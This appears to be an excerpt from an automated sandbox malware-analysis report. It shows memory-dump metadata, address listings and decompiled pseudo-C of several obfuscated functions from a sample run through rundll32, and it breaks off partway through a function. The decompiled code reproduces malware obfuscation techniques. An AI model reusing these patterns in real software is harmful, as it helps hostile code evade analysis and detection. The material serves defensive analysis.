                                                                                                                                  0x002ed69c
                                                                                                                                  0x002ed6a4
                                                                                                                                  0x002ed6ac
                                                                                                                                  0x002ed6b4
                                                                                                                                  0x002ed6bc
                                                                                                                                  0x002ed6c9
                                                                                                                                  0x002ed6cd
                                                                                                                                  0x002ed6d5
                                                                                                                                  0x002ed6e2
                                                                                                                                  0x002ed6e6
                                                                                                                                  0x002ed6ee
                                                                                                                                  0x002ed6f6
                                                                                                                                  0x002ed6fe
                                                                                                                                  0x002ed6fe
                                                                                                                                  0x002ed70c
                                                                                                                                  0x002ed7ec
                                                                                                                                  0x00000000
                                                                                                                                  0x002ed712
                                                                                                                                  0x002ed718
                                                                                                                                  0x002ed839
                                                                                                                                  0x002ed71e
                                                                                                                                  0x002ed71e
                                                                                                                                  0x002ed720
                                                                                                                                  0x00000000
                                                                                                                                  0x002ed726
                                                                                                                                  0x002ed726
                                                                                                                                  0x002ed72e
                                                                                                                                  0x002ed734
                                                                                                                                  0x002ed737
                                                                                                                                  0x002ed73c
                                                                                                                                  0x002ed745
                                                                                                                                  0x002ed74c
                                                                                                                                  0x002ed750
                                                                                                                                  0x002ed75c
                                                                                                                                  0x002ed7d4
                                                                                                                                  0x002ed7da
                                                                                                                                  0x002ed7df
                                                                                                                                  0x002ed7e2
                                                                                                                                  0x00000000
                                                                                                                                  0x002ed7e2
                                                                                                                                  0x002ed720
                                                                                                                                  0x002ed718
                                                                                                                                  0x002ed840
                                                                                                                                  0x002ed84b
                                                                                                                                  0x002ed84b
                                                                                                                                  0x002ed807
                                                                                                                                  0x002ed80c
                                                                                                                                  0x002ed80f
                                                                                                                                  0x002ed811
                                                                                                                                  0x002ed81a
                                                                                                                                  0x00000000
                                                                                                                                  0x002ed813
                                                                                                                                  0x002ed813
                                                                                                                                  0x00000000
                                                                                                                                  0x002ed813
                                                                                                                                  0x00000000
                                                                                                                                  0x002ed81f
                                                                                                                                  0x002ed81f
                                                                                                                                  0x002ed81f
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: T.~$hc$ru$($0$K<
                                                                                                                                  • API String ID: 0-2343433060
                                                                                                                                  • Opcode ID: 1b4b13cabd92a24fdc23501e4117e7220d11670ab697f6225a926fef48805aa2
                                                                                                                                  • Instruction ID: 090bc33d6caa1044b29ceab58a93fcec95b1a6b20035aa6fc2bbb02c19a48cbb
                                                                                                                                  • Opcode Fuzzy Hash: 1b4b13cabd92a24fdc23501e4117e7220d11670ab697f6225a926fef48805aa2
                                                                                                                                  • Instruction Fuzzy Hash: 2EC122725183809FD768CF21C98AA5BFBE1FBD5704F504A1DF29A96260C7B28958CF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D3E3F Relevance: 7.7, Strings: 6, Instructions: 217COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                  			E002D3E3F() {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t213;
				signed int _t214;
				void* _t216;
				signed int _t222;
				intOrPtr _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				void* _t230;
				void* _t236;
				void* _t257;
				signed int* _t261;

				_t261 =  &_v100;
				_v8 = 0xc74bd8;
				_v4 = 0;
				_v72 = 0x3d4417;
				_v72 = _v72 << 8;
				_v72 = _v72 + 0xffff33fd;
				_v72 = _v72 ^ 0xbd434afc;
				_v32 = 0xa9ac19;
				_v32 = _v32 + 0x4aca;
				_v32 = _v32 ^ 0x00a9f6e1;
				_v40 = 0x1f6a8;
				_v12 = 0;
				_v40 = _v40 * 0x6f;
				_t257 = 0xf52a3f4;
				_v40 = _v40 ^ 0x00d19880;
				_v44 = 0x168b17;
				_v44 = _v44 + 0x13a5;
				_v44 = _v44 ^ 0x001ee95f;
				_v48 = 0xfac2ed;
				_v48 = _v48 + 0xffff2a35;
				_v48 = _v48 ^ 0x00fbd9f9;
				_v92 = 0xc00c53;
				_v92 = _v92 + 0xffff1aa9;
				_v92 = _v92 + 0xf2d7;
				_t225 = 0x68;
				_v92 = _v92 / _t225;
				_v92 = _v92 ^ 0x0000565c;
				_v68 = 0xf2ac97;
				_v68 = _v68 ^ 0x99fc0549;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x000a8804;
				_v24 = 0xf89d13;
				_t226 = 0x49;
				_v24 = _v24 / _t226;
				_v24 = _v24 ^ 0x000ed122;
				_v96 = 0x9976f7;
				_v96 = _v96 >> 0xe;
				_v96 = _v96 ^ 0xdd1af6ea;
				_v96 = _v96 ^ 0x684d855d;
				_v96 = _v96 ^ 0xb5551d4c;
				_v28 = 0x12a2d6;
				_t227 = 0xe;
				_v28 = _v28 * 0x29;
				_v28 = _v28 ^ 0x02ffade5;
				_v100 = 0x1d8880;
				_v100 = _v100 + 0x8a1e;
				_v100 = _v100 * 0x7c;
				_v100 = _v100 + 0xffff421a;
				_v100 = _v100 ^ 0x0e9f1559;
				_v36 = 0x784079;
				_v36 = _v36 / _t227;
				_v36 = _v36 ^ 0x0007caf6;
				_v60 = 0xd037f8;
				_v60 = _v60 >> 0xf;
				_v60 = _v60 + 0xfffff3b4;
				_v60 = _v60 ^ 0xfff3df4e;
				_v64 = 0x95f516;
				_v64 = _v64 + 0xffffc55a;
				_v64 = _v64 | 0x523f0ae6;
				_v64 = _v64 ^ 0x52b19695;
				_v84 = 0x271827;
				_v84 = _v84 + 0xffff7017;
				_v84 = _v84 + 0x1e15;
				_v84 = _v84 ^ 0xa1c53b6b;
				_v84 = _v84 ^ 0xa1e64a9e;
				_v52 = 0x3d5883;
				_v52 = _v52 >> 5;
				_v52 = _v52 << 3;
				_v52 = _v52 ^ 0x000b56f4;
				_v56 = 0xd5acf2;
				_v56 = _v56 ^ 0x15c9a5cd;
				_v56 = _v56 << 3;
				_v56 = _v56 ^ 0xa8e6808a;
				_v88 = 0xcc2476;
				_v88 = _v88 + 0x4ceb;
				_v88 = _v88 ^ 0xdbab884b;
				_t228 = 0x4f;
				_v88 = _v88 / _t228;
				_v88 = _v88 ^ 0x02ce2d39;
				_v20 = 0x9b21e;
				_v20 = _v20 + 0x218b;
				_v20 = _v20 ^ 0x00037084;
				_v76 = 0xcba48;
				_t229 = 0x5a;
				_t222 = _v12;
				_v76 = _v76 * 0x7b;
				_v76 = _v76 + 0x3acc;
				_v76 = _v76 << 0x10;
				_v76 = _v76 ^ 0xbb6cb0a9;
				_v80 = 0x9c886e;
				_v80 = _v80 ^ 0x88757b42;
				_t230 = 0x5c;
				_v80 = _v80 / _t229;
				_v80 = _v80 << 0xe;
				_v80 = _v80 ^ 0x5c6ae118;
				while(1) {
					L1:
					_t213 = 0xa360d2e;
					do {
						while(_t257 != _t213) {
							if(_t257 == 0xb87cfc3) {
								_t223 =  *0x2f3e10; // 0x0
								_t224 = _t223 + 0x1c;
								while(1) {
									__eflags =  *_t224 - _t230;
									if(__eflags == 0) {
										break;
									}
									_t224 = _t224 + 2;
									__eflags = _t224;
								}
								_t222 = _t224 + 2;
								_t257 = 0xc7301de;
								goto L1;
							} else {
								if(_t257 == 0xc7301de) {
									_push(_v48);
									_push(_v44);
									_t216 = E002EDCF7(_v40, 0x2d1080, __eflags);
									_pop(_t236);
									__eflags = E002DAAD6(_t216, _v92, _v68, _v72, _t236, _t236, _v24, _v96, _v28, _t236,  &_v16, _v100, _t236, _v32, _t236, _v36);
									_t257 =  ==  ? 0xa360d2e : 0x57f878b;
									E002DA8B0(_v60, _t216, _v64);
									_t261 =  &(_t261[0xf]);
									L14:
									_t213 = 0xa360d2e;
									_t230 = 0x5c;
									goto L15;
								} else {
									if(_t257 == 0xdd28c3f) {
										E002D1FD1(_v20, _v76, _v80, _v16);
									} else {
										if(_t257 != 0xf52a3f4) {
											goto L15;
										} else {
											_t257 = 0xb87cfc3;
											continue;
										}
									}
								}
							}
							L18:
							return _v12;
						}
						_t214 = E002D1F53(_v16, _v84, _v52, _t222, _v56, _v88);
						_t261 =  &(_t261[4]);
						__eflags = _t214;
						_t257 = 0xdd28c3f;
						_t191 = _t214 == 0;
						__eflags = _t191;
						_v12 = 0 | _t191;
						goto L14;
						L15:
						__eflags = _t257 - 0x57f878b;
					} while (__eflags != 0);
					goto L18;
				}
			}











































                                                                                                                                  0x002d3e3f
                                                                                                                                  0x002d3e42
                                                                                                                                  0x002d3e4c
                                                                                                                                  0x002d3e52
                                                                                                                                  0x002d3e5a
                                                                                                                                  0x002d3e5f
                                                                                                                                  0x002d3e67
                                                                                                                                  0x002d3e6f
                                                                                                                                  0x002d3e77
                                                                                                                                  0x002d3e7f
                                                                                                                                  0x002d3e87
                                                                                                                                  0x002d3e8f
                                                                                                                                  0x002d3e9c
                                                                                                                                  0x002d3ea0
                                                                                                                                  0x002d3ea5
                                                                                                                                  0x002d3ead
                                                                                                                                  0x002d3eb5
                                                                                                                                  0x002d3ebd
                                                                                                                                  0x002d3ec5
                                                                                                                                  0x002d3ecd
                                                                                                                                  0x002d3ed5
                                                                                                                                  0x002d3edd
                                                                                                                                  0x002d3ee5
                                                                                                                                  0x002d3eed
                                                                                                                                  0x002d3efb
                                                                                                                                  0x002d3f00
                                                                                                                                  0x002d3f06
                                                                                                                                  0x002d3f0e
                                                                                                                                  0x002d3f16
                                                                                                                                  0x002d3f1e
                                                                                                                                  0x002d3f23
                                                                                                                                  0x002d3f2b
                                                                                                                                  0x002d3f37
                                                                                                                                  0x002d3f3c
                                                                                                                                  0x002d3f42
                                                                                                                                  0x002d3f4a
                                                                                                                                  0x002d3f52
                                                                                                                                  0x002d3f57
                                                                                                                                  0x002d3f5f
                                                                                                                                  0x002d3f67
                                                                                                                                  0x002d3f6f
                                                                                                                                  0x002d3f7c
                                                                                                                                  0x002d3f7d
                                                                                                                                  0x002d3f81
                                                                                                                                  0x002d3f89
                                                                                                                                  0x002d3f91
                                                                                                                                  0x002d3f9e
                                                                                                                                  0x002d3fa2
                                                                                                                                  0x002d3faa
                                                                                                                                  0x002d3fb2
                                                                                                                                  0x002d3fc0
                                                                                                                                  0x002d3fc4
                                                                                                                                  0x002d3fcc
                                                                                                                                  0x002d3fd4
                                                                                                                                  0x002d3fd9
                                                                                                                                  0x002d3fe1
                                                                                                                                  0x002d3fe9
                                                                                                                                  0x002d3ff1
                                                                                                                                  0x002d3ff9
                                                                                                                                  0x002d4001
                                                                                                                                  0x002d4009
                                                                                                                                  0x002d4011
                                                                                                                                  0x002d4019
                                                                                                                                  0x002d4023
                                                                                                                                  0x002d4030
                                                                                                                                  0x002d4038
                                                                                                                                  0x002d4040
                                                                                                                                  0x002d4045
                                                                                                                                  0x002d404a
                                                                                                                                  0x002d4052
                                                                                                                                  0x002d405a
                                                                                                                                  0x002d4062
                                                                                                                                  0x002d4067
                                                                                                                                  0x002d406f
                                                                                                                                  0x002d4077
                                                                                                                                  0x002d407f
                                                                                                                                  0x002d408d
                                                                                                                                  0x002d4092
                                                                                                                                  0x002d4098
                                                                                                                                  0x002d40a0
                                                                                                                                  0x002d40a8
                                                                                                                                  0x002d40b0
                                                                                                                                  0x002d40b8
                                                                                                                                  0x002d40c5
                                                                                                                                  0x002d40c6
                                                                                                                                  0x002d40cc
                                                                                                                                  0x002d40d0
                                                                                                                                  0x002d40d8
                                                                                                                                  0x002d40dd
                                                                                                                                  0x002d40e5
                                                                                                                                  0x002d40ed
                                                                                                                                  0x002d40fb
                                                                                                                                  0x002d40fc
                                                                                                                                  0x002d4100
                                                                                                                                  0x002d4105
                                                                                                                                  0x002d410d
                                                                                                                                  0x002d410d
                                                                                                                                  0x002d410d
                                                                                                                                  0x002d4112
                                                                                                                                  0x002d4112
                                                                                                                                  0x002d411c
                                                                                                                                  0x002d41bb
                                                                                                                                  0x002d41c1
                                                                                                                                  0x002d41c9
                                                                                                                                  0x002d41c9
                                                                                                                                  0x002d41cc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d41c6
                                                                                                                                  0x002d41c6
                                                                                                                                  0x002d41c6
                                                                                                                                  0x002d41ce
                                                                                                                                  0x002d41d1
                                                                                                                                  0x00000000
                                                                                                                                  0x002d4122
                                                                                                                                  0x002d4128
                                                                                                                                  0x002d4146
                                                                                                                                  0x002d414f
                                                                                                                                  0x002d4157
                                                                                                                                  0x002d415d
                                                                                                                                  0x002d41a0
                                                                                                                                  0x002d41ae
                                                                                                                                  0x002d41b1
                                                                                                                                  0x002d41b6
                                                                                                                                  0x002d4208
                                                                                                                                  0x002d420a
                                                                                                                                  0x002d420f
                                                                                                                                  0x00000000
                                                                                                                                  0x002d412a
                                                                                                                                  0x002d4130
                                                                                                                                  0x002d422e
                                                                                                                                  0x002d4136
                                                                                                                                  0x002d413c
                                                                                                                                  0x00000000
                                                                                                                                  0x002d4142
                                                                                                                                  0x002d4142
                                                                                                                                  0x00000000
                                                                                                                                  0x002d4142
                                                                                                                                  0x002d413c
                                                                                                                                  0x002d4130
                                                                                                                                  0x002d4128
                                                                                                                                  0x002d4235
                                                                                                                                  0x002d4240
                                                                                                                                  0x002d4240
                                                                                                                                  0x002d41f0
                                                                                                                                  0x002d41f7
                                                                                                                                  0x002d41fa
                                                                                                                                  0x002d41fc
                                                                                                                                  0x002d4201
                                                                                                                                  0x002d4201
                                                                                                                                  0x002d4204
                                                                                                                                  0x00000000
                                                                                                                                  0x002d4210
                                                                                                                                  0x002d4210
                                                                                                                                  0x002d4210
                                                                                                                                  0x00000000
                                                                                                                                  0x002d421c

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: .6$.6$.6$y@x$?R$L
                                                                                                                                  • API String ID: 0-3177096336
                                                                                                                                  • Opcode ID: f26b41d25f4dbc6d6fd0d0a13f33cfe8e76d06b12b3ea5db1aa2d6c30807d58a
                                                                                                                                  • Instruction ID: e21b1538bf14c4cae1f5f26ceab99756c57ffe267b54efcaed05e8dc0bb4d417
                                                                                                                                  • Opcode Fuzzy Hash: f26b41d25f4dbc6d6fd0d0a13f33cfe8e76d06b12b3ea5db1aa2d6c30807d58a
                                                                                                                                  • Instruction Fuzzy Hash: A5A14FB25083819FD798CF26C88A41BBBE1FBD4758F108A1EF19986260D3B1C959CF46
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002DB74D Relevance: 7.7, Strings: 6, Instructions: 217COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E002DB74D(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t231;
				intOrPtr _t232;
				intOrPtr _t233;
				void* _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				void* _t266;
				void* _t267;
				signed int* _t270;
				signed int* _t271;

				_t270 =  &_v104;
				_v4 = _v4 & 0x00000000;
				_v12 = 0x6c2b32;
				_v8 = 0x58b11;
				_v64 = 0x37f8ee;
				_v64 = _v64 + 0xffff6702;
				_v64 = _v64 ^ 0xad40df3f;
				_v64 = _v64 ^ 0xad79282c;
				_v100 = 0x6d524;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 + 0x2921;
				_v100 = _v100 >> 6;
				_v100 = _v100 ^ 0x00050ee9;
				_v28 = 0x9e9a;
				_t266 = __edx;
				_t237 = __ecx;
				_t267 = 0x52ffaa2;
				_t239 = 0xb;
				_v28 = _v28 / _t239;
				_v28 = _v28 ^ 0x00028e70;
				_v32 = 0x2476b5;
				_t240 = 0x6f;
				_v32 = _v32 / _t240;
				_v32 = _v32 ^ 0x0008b44d;
				_v60 = 0x9e7d2d;
				_v60 = _v60 >> 0xc;
				_v60 = _v60 << 0xe;
				_v60 = _v60 ^ 0x02752993;
				_v24 = 0xe09194;
				_t241 = 0x44;
				_v24 = _v24 / _t241;
				_v24 = _v24 ^ 0x0009703f;
				_v96 = 0x854eb1;
				_v96 = _v96 + 0xc1c6;
				_v96 = _v96 * 0x1a;
				_v96 = _v96 | 0x594c04b7;
				_v96 = _v96 ^ 0x5dd9e9b5;
				_v20 = 0x86d30b;
				_v20 = _v20 | 0xe45dff90;
				_v20 = _v20 ^ 0xe4d4624e;
				_v92 = 0x8501b9;
				_v92 = _v92 >> 6;
				_v92 = _v92 * 0x2f;
				_v92 = _v92 + 0xe9ed;
				_v92 = _v92 ^ 0x0060653e;
				_v52 = 0xaa921f;
				_v52 = _v52 ^ 0x3dfd2146;
				_v52 = _v52 >> 1;
				_v52 = _v52 ^ 0x1ea8ab64;
				_v56 = 0x2765e6;
				_v56 = _v56 ^ 0x5c8ea534;
				_v56 = _v56 | 0xccee86e2;
				_v56 = _v56 ^ 0xdcebf872;
				_v88 = 0x89b797;
				_v88 = _v88 + 0x84ba;
				_v88 = _v88 + 0xc14;
				_v88 = _v88 | 0xbe23ba3f;
				_v88 = _v88 ^ 0xbea6e118;
				_v48 = 0x866a1d;
				_v48 = _v48 >> 9;
				_v48 = _v48 * 0x16;
				_v48 = _v48 ^ 0x0007ec78;
				_v16 = 0x7d5d8a;
				_v16 = _v16 >> 8;
				_v16 = _v16 ^ 0x000578c4;
				_v68 = 0x2c77b1;
				_v68 = _v68 | 0xad369f51;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0xdff48475;
				_v72 = 0x3ef83;
				_v72 = _v72 << 3;
				_v72 = _v72 + 0xb46;
				_v72 = _v72 ^ 0x001ba742;
				_v76 = 0x4a0f2c;
				_t242 = 0x6a;
				_v76 = _v76 * 0x54;
				_v76 = _v76 << 0xa;
				_v76 = _v76 ^ 0x33e29f20;
				_v36 = 0x9fb368;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 ^ 0x000f389a;
				_v40 = 0x5cfe3a;
				_v40 = _v40 + 0x27ff;
				_v40 = _v40 ^ 0x005ee30c;
				_v104 = 0xfd26ea;
				_v104 = _v104 << 9;
				_v104 = _v104 + 0xffff1095;
				_v104 = _v104 + 0xffffd24c;
				_v104 = _v104 ^ 0xfa4b2973;
				_v80 = 0xbb493f;
				_v80 = _v80 + 0x4ae2;
				_v80 = _v80 | 0xbb4dbcb8;
				_v80 = _v80 + 0x3bc7;
				_v80 = _v80 ^ 0xbbf0b3fa;
				_v44 = 0xfc3c2e;
				_v44 = _v44 << 0x10;
				_v44 = _v44 + 0xffff4208;
				_v44 = _v44 ^ 0x3c281d99;
				_v84 = 0xc50344;
				_v84 = _v84 | 0xb9ed19f4;
				_v84 = _v84 / _t242;
				_t243 = 0x6b;
				_v84 = _v84 / _t243;
				_v84 = _v84 ^ 0x000f16db;
				while(1) {
					L1:
					_t231 = 0xc3f018b;
					do {
						L2:
						while(_t267 != 0x52ffaa2) {
							if(_t267 == 0x865547f) {
								_t243 = _v88;
								_t232 = E002DCDAE(_v88, _v48, _v16,  *((intOrPtr*)(_t266 + 0x38)));
								_t270 =  &(_t270[2]);
								 *((intOrPtr*)(_t266 + 0x1c)) = _t232;
								__eflags = _t232;
								_t231 = 0xc3f018b;
								_t267 =  !=  ? 0xc3f018b : 0xb7a2405;
								continue;
							}
							if(_t267 == 0xb133873) {
								_push(_v32);
								_t233 = E002EC3A0(_t237, _v64, __eflags, _v100, _v28, _t243);
								_t271 =  &(_t270[4]);
								 *((intOrPtr*)(_t266 + 0x38)) = _t233;
								__eflags = _t233;
								if(_t233 != 0) {
									E002D7B8B( *((intOrPtr*)(_t266 + 0x38)), _v60,  *((intOrPtr*)(_t266 + 0x38)), _v24, _v96);
									_push( *((intOrPtr*)(_t266 + 0x38)));
									_push(_v56);
									_push(_v52);
									_t243 = _v20;
									E002D7C37(_v20, _v92);
									_t270 =  &(_t271[6]);
									_t267 = 0x865547f;
									goto L1;
								}
							} else {
								if(_t267 == 0xb7a2405) {
									return E002E9E56(_v80, _v44, _v84,  *((intOrPtr*)(_t266 + 0x38)));
								}
								if(_t267 != _t231) {
									goto L13;
								} else {
									_t233 = E002D46BE(_t243, _v68, _t243, _v72, _t243, _v76, _v36, _v40, _t243, _t266, E002D4C5D, _v104);
									_t270 =  &(_t270[0xa]);
									 *((intOrPtr*)(_t266 + 0x2c)) = _t233;
									if(_t233 == 0) {
										_t267 = 0xb7a2405;
										while(1) {
											L1:
											_t231 = 0xc3f018b;
											goto L2;
										}
									}
								}
							}
							return _t233;
						}
						_t267 = 0xb133873;
						L13:
						__eflags = _t267 - 0x1aeb2e;
					} while (__eflags != 0);
					return _t231;
				}
			}









































                                                                                                                                  0x002db74d
                                                                                                                                  0x002db750
                                                                                                                                  0x002db755
                                                                                                                                  0x002db75d
                                                                                                                                  0x002db765
                                                                                                                                  0x002db76d
                                                                                                                                  0x002db775
                                                                                                                                  0x002db77d
                                                                                                                                  0x002db785
                                                                                                                                  0x002db78d
                                                                                                                                  0x002db792
                                                                                                                                  0x002db79a
                                                                                                                                  0x002db79f
                                                                                                                                  0x002db7a7
                                                                                                                                  0x002db7b7
                                                                                                                                  0x002db7b9
                                                                                                                                  0x002db7bf
                                                                                                                                  0x002db7c4
                                                                                                                                  0x002db7c9
                                                                                                                                  0x002db7cf
                                                                                                                                  0x002db7d7
                                                                                                                                  0x002db7e3
                                                                                                                                  0x002db7e8
                                                                                                                                  0x002db7ee
                                                                                                                                  0x002db7f6
                                                                                                                                  0x002db7fe
                                                                                                                                  0x002db803
                                                                                                                                  0x002db808
                                                                                                                                  0x002db810
                                                                                                                                  0x002db81c
                                                                                                                                  0x002db81f
                                                                                                                                  0x002db823
                                                                                                                                  0x002db82b
                                                                                                                                  0x002db833
                                                                                                                                  0x002db840
                                                                                                                                  0x002db844
                                                                                                                                  0x002db84c
                                                                                                                                  0x002db854
                                                                                                                                  0x002db85c
                                                                                                                                  0x002db864
                                                                                                                                  0x002db86c
                                                                                                                                  0x002db874
                                                                                                                                  0x002db87e
                                                                                                                                  0x002db882
                                                                                                                                  0x002db88a
                                                                                                                                  0x002db892
                                                                                                                                  0x002db89a
                                                                                                                                  0x002db8a2
                                                                                                                                  0x002db8a6
                                                                                                                                  0x002db8ae
                                                                                                                                  0x002db8b6
                                                                                                                                  0x002db8be
                                                                                                                                  0x002db8c6
                                                                                                                                  0x002db8ce
                                                                                                                                  0x002db8d6
                                                                                                                                  0x002db8de
                                                                                                                                  0x002db8e6
                                                                                                                                  0x002db8ee
                                                                                                                                  0x002db8f6
                                                                                                                                  0x002db8fe
                                                                                                                                  0x002db908
                                                                                                                                  0x002db90c
                                                                                                                                  0x002db914
                                                                                                                                  0x002db91c
                                                                                                                                  0x002db923
                                                                                                                                  0x002db930
                                                                                                                                  0x002db938
                                                                                                                                  0x002db940
                                                                                                                                  0x002db945
                                                                                                                                  0x002db94d
                                                                                                                                  0x002db955
                                                                                                                                  0x002db95a
                                                                                                                                  0x002db962
                                                                                                                                  0x002db96a
                                                                                                                                  0x002db979
                                                                                                                                  0x002db97c
                                                                                                                                  0x002db980
                                                                                                                                  0x002db985
                                                                                                                                  0x002db98d
                                                                                                                                  0x002db995
                                                                                                                                  0x002db99a
                                                                                                                                  0x002db9a2
                                                                                                                                  0x002db9aa
                                                                                                                                  0x002db9b2
                                                                                                                                  0x002db9ba
                                                                                                                                  0x002db9c2
                                                                                                                                  0x002db9c7
                                                                                                                                  0x002db9cf
                                                                                                                                  0x002db9d7
                                                                                                                                  0x002db9df
                                                                                                                                  0x002db9e7
                                                                                                                                  0x002db9ef
                                                                                                                                  0x002db9f7
                                                                                                                                  0x002db9ff
                                                                                                                                  0x002dba07
                                                                                                                                  0x002dba0f
                                                                                                                                  0x002dba14
                                                                                                                                  0x002dba1c
                                                                                                                                  0x002dba24
                                                                                                                                  0x002dba2c
                                                                                                                                  0x002dba3c
                                                                                                                                  0x002dba44
                                                                                                                                  0x002dba47
                                                                                                                                  0x002dba4b
                                                                                                                                  0x002dba53
                                                                                                                                  0x002dba53
                                                                                                                                  0x002dba53
                                                                                                                                  0x002dba58
                                                                                                                                  0x00000000
                                                                                                                                  0x002dba58
                                                                                                                                  0x002dba6a
                                                                                                                                  0x002dbb2d
                                                                                                                                  0x002dbb31
                                                                                                                                  0x002dbb36
                                                                                                                                  0x002dbb39
                                                                                                                                  0x002dbb3c
                                                                                                                                  0x002dbb40
                                                                                                                                  0x002dbb45
                                                                                                                                  0x00000000
                                                                                                                                  0x002dbb45
                                                                                                                                  0x002dba76
                                                                                                                                  0x002dbac0
                                                                                                                                  0x002dbad3
                                                                                                                                  0x002dbad8
                                                                                                                                  0x002dbadb
                                                                                                                                  0x002dbade
                                                                                                                                  0x002dbae0
                                                                                                                                  0x002dbaf8
                                                                                                                                  0x002dbafd
                                                                                                                                  0x002dbb00
                                                                                                                                  0x002dbb04
                                                                                                                                  0x002dbb0c
                                                                                                                                  0x002dbb10
                                                                                                                                  0x002dbb15
                                                                                                                                  0x002dbb18
                                                                                                                                  0x00000000
                                                                                                                                  0x002dbb18
                                                                                                                                  0x002dba78
                                                                                                                                  0x002dba7a
                                                                                                                                  0x00000000
                                                                                                                                  0x002dbb75
                                                                                                                                  0x002dba82
                                                                                                                                  0x00000000
                                                                                                                                  0x002dba88
                                                                                                                                  0x002dbaa9
                                                                                                                                  0x002dbaae
                                                                                                                                  0x002dbab1
                                                                                                                                  0x002dbab6
                                                                                                                                  0x002dbabc
                                                                                                                                  0x002dba53
                                                                                                                                  0x002dba53
                                                                                                                                  0x002dba53
                                                                                                                                  0x00000000
                                                                                                                                  0x002dba53
                                                                                                                                  0x002dba53
                                                                                                                                  0x002dbab6
                                                                                                                                  0x002dba82
                                                                                                                                  0x002dbb7d
                                                                                                                                  0x002dbb7d
                                                                                                                                  0x002dbb4d
                                                                                                                                  0x002dbb52
                                                                                                                                  0x002dbb52
                                                                                                                                  0x002dbb52
                                                                                                                                  0x00000000
                                                                                                                                  0x002dba58

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !)$2+l$>e`$?p$J$e'
                                                                                                                                  • API String ID: 0-1675410552
                                                                                                                                  • Opcode ID: fadffdc5591e0e9458c210e0235ea609e3becd43873a798e6ba19247d4405ef4
                                                                                                                                  • Instruction ID: 78dd43d0c613db8db91dfc786cc9e410fe3ba4116f71ce5c314990c9080640bb
                                                                                                                                  • Opcode Fuzzy Hash: fadffdc5591e0e9458c210e0235ea609e3becd43873a798e6ba19247d4405ef4
                                                                                                                                  • Instruction Fuzzy Hash: 4BB141724083819FC358CF65C58A40BFBE2FBC5748F108A1DF58A96260D3B5CA69CF86
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002DE5CF Relevance: 7.7, Strings: 6, Instructions: 204COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E002DE5CF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
